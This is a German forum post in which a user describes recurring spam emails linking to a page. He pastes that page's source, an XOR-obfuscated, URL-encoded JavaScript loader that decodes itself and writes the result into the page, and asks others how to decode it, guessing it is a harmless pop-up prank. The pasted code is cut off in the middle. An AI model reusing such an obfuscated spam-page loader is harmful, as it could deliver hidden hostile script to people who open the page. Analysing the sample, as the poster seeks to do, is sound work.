HAllo !

Alsom, ich bekomme regelmäßig (alle 2 Tage oder so) Spam von irgendwem, in der Regel immer HTML-Mail mit Inhalt "Videonachricht" für dich .... bla bla bla, heute mal "hi schatzi, ich habe dir ja nicht geantwortet, hier ist ein "persönlicher Link" nur für dich ...".

Ich lese mir so was ja nie durch, aber ich habe mal bei beiden Typen mir die verlinkte Seite gedownloadet und den Quelltext angeschaut, und es kam immer so was wie das hier:

<html>
<script language = "JavaScript">
var x='';x+='%3Cscript%20language%20%3D%20%22JavaScript%22%3Efunction%20d%28t%2Ck%29%7Bvar%20y%3D0%3Bvar%20r%3D%27%27%3Bt%3Dunescape%28t%29%3Bfor%20%28i%3D0%3Bi%3Ct%2Elength%3Bi%2B%2B%29%7Bx%3Dk%2EcharCodeAt%28y%29%3Bx2%3Dt%2EcharCodeAt%28i%29%3Bif%28x%21%3Dx2%29%7Br%3Dr%2BString%2EfromCharCode%28x2%5Ex%29%3B%7D';x+='else%7Br%3Dr%2BString%2EfromCharCode%28x%29%3B%7Dy%2B%2B%3Bif%28y%3D%3Dk%2Elength%29%7By%3D0%3B%7D%7Dreturn%28escape%28r%29%29%3B%7Dfunction%20D3N805P68G3VJ56R%28w%2Ck%29%7Bdocument%2Ewrite%28unescape%28d%28w%2Ck%29%29%29%3B%7Dvar%20k%3D%272787569790%27%3B%3C%2Fscript%3E';document.write(unescape(x));D3N805P68G3VJ56R('%0ED%5BE%5CFM%17UQ%5CPMVRS%19%0A%19%12xVNVfUK%5EID%10%09%5EB%5BUM%5EV%5E%12T%10%40%1CMOVK%10J%0A%08%0CSYK%17%11Y%0F%07%03%5E%09%1EN%19M%5FaCJ%5E%5BQ%11%1E%10%1E%5ERVPA%5E%02%5E%12%1B%1BL%40%1C%08%1EN%19M%5FaCJ%5E%5BQ%11%1E%10%1EQ%5FYEvY%5DRxD%1A%5E%11%1C%5C%0DDE%5CDGEV%1FM%1F%02JPV%12%1F%5B%1FfBK%5EWW%1B%16%05%03%04%03%0F%1EBX2787569790%0FzYC%5D%18KXL%5EV%1FuVA%5E%17EX%5EVXU%1F%1C%1C9%0E9%09%0B%0E%01%0E%1C%0DD%5E%5F%18%1AT%10dADPY%5E%18VX%5BBXSWC%17G%40%5ELR%1C%1F%10%16%04%04%02%03%08%1EN%5E%0B7%01%07%07%01%017%0C%06%04zXDZ%19JX%40X%5D%1FtQF%5F%16ETX%5DXT%18%1B%1D%01%0E%0C%0F9%0E9%09%1B%0CE%5ES%1EZ%1F%5D%1EFXkCG%5FWP%11%19%1B%16%05%10%01%039%0E%0C%17%1BLP%05%02%0E%0E%02%0F%09%05%0E%08%0AxWM%5F%17B%5DBVS%1D%7BXCQ%1E%40VVSZ%5B%11%1E%13%09%0B%0E%01%0E%0C%0F9%1E%02MW%5BKRN%5E%0B7%01%07%07%01%017%0C%06%04%06%09%09%02%018%07%07%079%0CDVGY%5BC%5CYW%17qd%7F%05%7Fc%04zsbw%7C%07%7D%0Cq%03b%01q%11G%1E%5C%11LCWK%17A%0D%07%01%0F%06%01%0F%0D%07%02%10Q%0AP%05%02%0E%0E%02%0F%09%05%0E%08%1AM%0D%19O%19%0D%12O%16CZeMEP%5EU%1F%11%0C%15%5D%04T%17D%5DdLE%5CX%5E%1F%10%0BVX%5BBXSWC%17G%40%5ELR%1DCWRJSSG%5D%1FQ%1EN%1BR%19%1B%1E%03J%09%19JTKYBC%06',k);HTM2GT1LJUNL5J4F6T8F('%0DCPAPFA%12%5BX%5FWFR%5ES%15%0F%17%1B%7BQERjUG%5BGM%13%0EUFWUA%5BXW%11S%1BD%10MCSE%19I%0D%03%08%5FYG%12%1FP%0C0%08Z%05%1EB%1CCVbDAZWQ%1D%1B%1E%17%5DU%5DTM%5E%0E%5B%1C%12%18KK%18%04%1EB%1CCVbDAZWQ%1D%1B%1E%17RXRAzYQWvM%19Y%1A%18P%0DH%40RMDB%5D%1BA%1F%0EO%5E%5F%19%18P%1BjBG%5BY%5E%19U%40PXFP%1B%1E%10%10%0D%07%02%0C%06%1CI%5F%08%01%033%0A%0F%03%07%05%0E%04%7CQG%5B%17DZGY%5D%19%7DRGQ%18GSY%5D%5E%5D%1B%1A%13%0F%0C%0B%0E9%08%09%0A%1A%02K%5CT%1F%11R%18%60GK%5F%5BU%1FL%5FU%40PXFP%1B%1E%10%10%0D%07%07%0F%06%1CI%5F%08%01%033%0A%0F%03%07%05%0E%04%7CQG%5B%17DZGY%5D%19%7DRGQ%18GSY%5D%5E%5D%1B%1A%13%0F%0C%0B%0E9%08%09%0A%1A%02K%5D%03%07%0A%02%09%05%06%0B%01%0C%0F%06%0E1%03%03%0B%09%07%06%04%0CPW%10%1BP%11r%06%7C%0F%09%04%60%05%0B%7E%05cx%02%0Fc%1EG%5CjBG%5BY%5E%19%19%1A%13%18%0B%15%157%0C%09%04%14%1A%19M%5D%03%07%0A%02%09%05%06%0B%01%0C%0FzXEX%1DAVC%5BV%1FtPD%5B%1DKW%5BVXT%19%19%19%0A9%0F%0C%0B%0E9%08%19%08N%5FC%5BQCP%5E%5E%13g%09s%02%03%7D%0Avvk%7Dr%1EB%1E%5C%10JFRA%19N%08%06%02%0F%01%09%01%02%01%0D%15Q%0AQ1033965279%1CH%08%13A%16%08%12O%17E%5F%60GK%5F%5BU%1F%10%0A%10X%0EZ%18A%5DdMCY%5DT%11%1F%0EVXZD%5DV%5DM%18B%40%5EMT%18F%5D%5CEVSG%5C%19T%1BD%15%5D%1C%1B%1E%02L%0C%1C%40ZD%5CBC%07',k);T0E71J3GFXNK('%0DEUE%5DGD%19%5DY%5FQCVSR%10%04%11%1A%7BW%40VgTBPAL%13%08PBZTDP%5EV%11U%1E%40%1DLFXC%18I%0B%06%0CRXB%19%19Q%0C%06%0D%5E%08%1FG%17EWbBD%5EZP%18%10%18%16%5DSXP%40%5F%0BP%1A%13%18MN%1C%09%1FG%17EWbBD%5EZP%18%10%18%16R%5EWEwXT%5CpL%19%5F%1F%1C%5D%0CMKTLDDX%1FL%1E%0BDX%5E%11%1EU%1FgCBP%5F%5F%18%17%0B%03%05%02%06%10JP1667470918%0C%7BWC%5C%19BVDVU%1E%7BV%40%5F%1EKPVUY%5B%1F%1D%1D%099%08%01%08%0F%0F%0E%1D%0CMPW%10%19U%1Ed%40EYWV%10UYUBYR%5EM%1FOC%5FBR%1D%1E%19%18%0C%0C%01%02%06%1EO%5F%01%0F%07%0F%05%01%06%0E%05%0F%0DtPLY%18DXAYT%11%7CYE%5E%18EUYTV%5C%10%18%1C%0F%0E%0D%0E%099%08%01%18%0DK%5ER%1FS%11U%16EYeCF%5E%5E%5E%19%11%18%17%0B%104%02%099%04%1F%18M%5E%06%02%01%07%0D%06%08%08%07%0E%0AyVDQ%1FJ%5ECXS%1CzQMY%16CWXS%5BZ%18%10%1B%01%08%0F%0F%0E%0D%0E%09%10%0AETZERO%5F%01%0F%07%0F%05%01%06%0E%05%0F%0D9%01%08%01%07%07%06%06%07%0BDX%5E%11%1EU%... u.s.w.  das forumsystem lässt mich nicht alles machen, also sagt mir bitte, wies geht ...

11DZRKWTGW%1C%5D%19C%1BS%1D%1C%1E%09I%05%1EGTJ%5DEC%0C',k);J331421Q333CW067O0J('%0EDSD%5EBB%18%5EV%5CPEWPW%16%05%12%15xVFWdQDQBC%10%09VCYQBQ%5DY%12T%18A%1EI%40Y%40%17J%0A0%0DQ%5DD%18%1A%5E%0F%07%0B%5F%0B%1AA%16FXaCB%5FYU%1E%11%1B%19%5ER%5EQCZ%0DQ%19%1C%1BLH%1D%0A%1AA%16FXaCB%5FYU%1E%11%1B%19Q%5FQDt%5DR%5DsC%1A%5E%19%1D%5E%09KJWCGE%5E%1EO%1B%0DE%5BQ%12%1FS%1EdFDQ%5CP%1B%16%0D%02%06%076%11I%5F2706726827%0FzQB%5F%1CDWGYV%1F%7DWCZ%18JSYVX%5D%1E%1E%18%0F%01%0B%0E%0B%0E%09%0F%1E%09KQT%1F%1AT%18eC%40%5FVU%1FVXSCZWXL%1C%40%40%5EDS%1E%1B%1F%19%0F%03%02%030%1FLZ%04%0F%02%01%05%05%06%0E%05%05%0BuSCZ%19BYB%5CR%10%7FVF%5F%1EDV%5CRW%%04%0C%02%0D%01%042%05%0FxTEQ%1DF%5DE%5CQ%1D%7CXG%5C%1CBS%5BQ%5ET%1B%1D%18%09%0B%0C%0C%089%0A%0D%1B%0BOS%40%5FZG%5D%5D%5E%12%7F%04%01v%04%07%0A%60%7Fpe%04%7F%03%02te%1AB%19Z%10HBSB%12M%08%03%0C%02%03%04%01%06%05%0E%11Z%0E%5C%07%01%0B%06%01%03%09%01%01%1FH%09%15M%11%04%13L%1CD%15RYZUSV%5D%18TBV%14rYA%40YY%5EC%5DV%40P%5B%18%5E%5BYWXW%5B%1B%16%1B%7F%5FRUW%15%5C%5B%5D%17WQUSYY%5D%15%3A%3A%14%13%12%15%15%18Q%5EB%14%08%1F%1C%09%17SX%5E%40%0D%0E%1AA%5C%0B%3A%3A%14%13%0E%1AAJ%0B%3A%3A%08%1CFTWTP%09%3D%3E%0FPG%0B5%3F%0BRF%0D%3F%3F%09%17WXTM%0D%3F%3F%09%17%5DC%5DX%0D%3F%3F',k);
</script>
</html>

Schön, das ist eindeutig ein verschlüsselter JavaScript, aber wie kann ich rausfinden, was der macht ?

[ Ich schätze, er macht so was wie http://www.raus.de/crashme/ - nichts schlimmes, nur ein einfacher Script, der das Browserfenster rumfahren lässt. Am besten mit sowas wie opera anschauen, da kommen nacher nicht die dummen fensterchen (zumindest so nervig nicht) ]

Wer ihn entschlüsselt hat, einfach posten, "auswertung" ist dann keine Mühe mehr.

Vielen Dank, Kryp(t)oanalytiker ;-)

benji